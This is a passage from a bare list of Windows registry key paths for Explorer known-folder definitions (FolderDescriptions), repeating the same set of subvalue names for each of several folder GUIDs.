HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2400183A-6185-49FB-A2D8-4A392A602BA3}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{D9DC8A3B-B784-432E-A781-5A1130A75963}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C4900540-2379-4C75-844B-64E6FAF8716B}\Roamable
